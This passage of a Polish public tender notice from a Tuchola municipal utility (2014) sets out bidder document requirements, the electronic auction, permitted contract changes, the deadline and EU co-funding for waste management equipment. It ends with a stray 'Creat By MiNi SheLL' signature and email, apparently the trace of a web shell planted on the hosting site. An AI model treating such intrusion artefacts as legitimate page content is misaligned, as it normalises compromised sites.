<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W przypadku wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)	W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:
a)	Karty katalogowe lub specyfikacje techniczne producenta potwierdzające, że oferowane urządzenia i maszyny spełniają wymagania parametrów techniczno - użytkowych, jakie zostały określone w załączniku Nr 9 do SIWZ.
b)	Zdjęcia lub foldery obrazujące oferowane urządzenia i maszyny wymienione w załączniku Nr 9 do SIWZ,
c)	Wykaz punktów serwisowych, które mogą świadczyć obsługę dostarczanych urządzeń i maszyn wymienionych w załączniku Nr 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://zakupy.marketplanet.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej Umowy muszą być dokonywane z zachowaniem wymogów wynikających z przepisów Prawa zamówień publicznych.
2.	Dopuszczalne jest dokonywanie zmian niniejszej Umowy o charakterze nieistotnym, przez co należy rozumieć zmiany nieodnoszące się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu zawarcia niniejszej umowy nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą.     W powyższym kontekście nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych przykładowo: zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana osób wskazanych do kontaktów między Stronami, zmiana osób pełniących funkcję kierownicze w ramach realizacji robót.
3.	Określając warunki dokonania zmiany niniejszej umowy, sporządza się Protokół konieczności, biorąc pod uwagę w szczególności: 
1)	opis zmiany, 
2)	uzasadnienie zmiany, 
3)	koszt zmiany i sposób jego wyliczenia, 
4)	wpływ zmiany na wysokość wynagrodzenia, 
5)	czas wykonania zmiany, 
6)	wpływ zmiany na termin zakończenia umowy. 
4.	Przewiduje się możliwość zmiany postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1)	Przedłużenie czasu na ukończenie jest możliwe jedynie w przypadku zaistnienia okoliczności, których wystąpienie nie wynika z przyczyn zawinionych przez  Wykonawcę lub Zamawiającego oraz których charakter uniemożliwia dochowanie ustalonego terminu - tj. w szczególności:
a)	wystąpienia kolizji budowlanych obiektów z elementami istniejącej infrastruktury, wystąpienia nieprzewidzianych w dokumentacji opisującej przedmiot niniejszej umowy warunków archeologicznych lub terenowych - w szczególności: niewypały i niewybuchy; wykopaliska archeologiczne,
b)	wystąpienia klęsk żywiołowych czy anomalnych (wyjątkowo niesprzyjających) warunków pogodowych, siły wyższej (siła wyższa, to zdarzenie zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się zdarzenia w określonej sytuacji, a którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia wykonawcy wykonywanie w części lub całości jego zobowiązań),
2)	Zmiany zakresu rzeczowego zamówienia, które są następstwem:
a)	przypadku zaistnienia kolizji planowanych do wybudowania obiektów z elementami istniejącej infrastruktury,
b)	zakończenia produkcji maszyn lub urządzeń, w takiej sytuacji Zamawiający dopuszcza zamianę oferowanej przez Wykonawcę maszyny lub urządzenia pod warunkiem, że zamieniana maszyna lub urządzenie spełnia wszelkie wymagania techniczno - użytkowe określone w specyfikacji istotnych warunków zamówienia, a zamiana nie prowadzi do zmiany ceny oferty Wykonawcy.
3)	Zmiany parametrów materiałów i urządzeń mogą nastąpić w następujących przypadkach:
a)	obniżenia kosztu ponoszonego przez Zamawiającego na eksploatację, konserwację i inne,
b)	poprawienia sprawności, wydajności,
c)	poprawienia parametrów technicznych,
d)	aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
4)	Zmniejszenie zakresu rzeczowego Umowy może nastąpić na skutek okoliczności, których nie można było przewidzieć na etapie przygotowywania Umowy, w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie udokumentowane poniesione już  koszty tego zakresu rzeczowego.
5)	Zmiana wysokości wynagrodzenia może nastąpić na skutek zmiany przepisów prawa powszechnie obowiązującego, w szczególności w zakresie stawek podatku od towarów i usług.
6)	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę.
7)	Zamawiający dopuszcza zmianę osoby inspektora nadzoru, kadry zespołu projektowego i kierownika budowy, specjalistów pod warunkiem, że nowa osoba posiada takie same uprawnienia lub kwalifikacje i spełnia wymogi SIWZ. 
8)	Warunkiem wprowadzenia zmian do Umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół konieczności wykonania wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor nadzoru,  oraz Kierownik budowy.
9)	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
10)	Nie stanowią natomiast zmiany istotnej umowy w rozumieniu art 144 ustawy PZP zmiany związane z obsługą administracyjno-organizacyjną umowy ( np. zmiana rachunku bankowego lub zmiana danych teleadresowych)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.tuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Komunalne w Tucholi, sp. z o.o.
ul. Świecka 68
89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 11:00, miejsce: Sekretariat Przedsiębiorstwa Komunalnego w Tucholi, sp. z o.o.
ul. Świecka 68
89-500 Tuchola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie dofinansowany ze środków Europejskiego Funduszu w ramach Regionalnego Programu Operacyjnego Województwa kujawsko-pomorskiego na lata 2007 - 2013, Oś Priorytetowa 2. Zachowanie i racjonalne użytkowanie środowiska Działanie 2.2. Gospodarka odpadami..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com